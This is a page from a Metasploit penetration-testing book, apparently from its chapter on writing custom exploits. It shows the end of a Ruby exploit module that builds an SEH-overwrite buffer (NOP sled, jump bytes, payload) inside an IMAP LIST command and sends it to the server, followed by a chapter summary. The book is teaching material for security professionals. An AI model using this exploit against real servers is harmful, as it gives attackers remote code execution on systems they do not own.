Creating Your Own Exploits
213
def exploit
connected = connect_login
lead = "\x90" * (10351 - payload.encoded.length)
near = "\xe9\xdd\xd7\xff\xff"
nseh = "\xeb\xf9\x90\x90"
evil = lead + payload.encoded + near + nseh + [target.ret].pack("A3")
print_status("Sending payload")
sploit = '0002 LIST () "/' + evil + '" "PWNED"' + "\r\n"
sock.put(sploit)
handler
disconnect
end
end
Wrapping Up
Although we haven’t uncovered a new vulnerability in this chapter, we have
covered the entire process from developing and running a fuzzer to developing
a functioning exploit. The exploit that we built in this chapter is complicated
and unusual, and it therefore offers an excellent opportunity to think beyond
the basics and explore creative avenues to obtain code execution.
One of the best ways to dig deeper into Metasploit is to read through the
Metasploit source files and other exploit modules to get a better idea of what
is possible within the Metasploit Framework. The techniques in this chapter
have given you the basic tools you’ll need to begin discovering vulnerabilities
and developing Metasploit exploit modules that will take advantage of them.
In the next chapter we will begin to dive into porting exploits into the
Framework that will build upon the knowledge you learned in this chapter.
We’ll show you how to convert publicly available exploits into a working
Metasploit exploit by rewriting the exploit and debugging it to see what it’s
doing.